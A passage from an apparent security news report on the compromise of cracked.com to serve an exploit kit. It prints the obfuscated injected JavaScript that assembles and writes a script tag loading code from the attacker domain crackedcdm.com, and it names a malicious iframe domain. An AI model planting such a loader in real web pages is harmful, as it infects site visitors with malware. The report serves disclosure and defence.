Consider also that at the time of this post the malware used was detected by only 7 of the 46 antivirus engines on virustotal.com. Barracuda Labs malware specialists describe the infection as a stealthy one: the only visible signs of compromise are that a Java plugin has been launched and that the system is running low on memory.
Popular websites are privileged targets for cyber criminals: a few weeks ago the php.net website was compromised for the same purpose, redirecting visitors to the Magnitude exploit kit and compromising a great number of users.
The exploit was served through the following malicious JavaScript, injected into cracked_com, which builds a script tag piece by piece so that the hostname crackedcdm.com never appears as a literal string (the concatenation decodes to http://i.crackedcdm.com/i.php):
// obfuscated loader found on cracked_com; the string fragments are reassembled below
var tyi = "cdm."; var itwo = "cracked"; var itto = "/"; var phw = "php"; var jfw = "src"; var fscr = "script"; var twi = "i"; var htp = "http"; var vol54 = "src";
// writes <script src=http://i.crackedcdm.com/i.php></script> into the page
document.write("<"+fscr+" "+jfw+"="+htp+":"+itto+""+itto+""+twi+"."+itwo+""+tyi+"com"+itto+""+twi+"."+phw+"><"+itto+""+fscr+">");
The domain crackedcdm.com was registered on 2013-11-04, which suggests that the attackers were able to serve their content from cracked_com at least that early.
Security experts also found on cracked_com an iframe pointing to “p68ei5[dot]degreeexplore[dot]biz,” which then pushed a collection of malicious Java, PDF, HTML and JavaScript files into the victim’s browser. If any of these exploits succeeded, the attackers were able to compromise the victim’s machine and install the malware.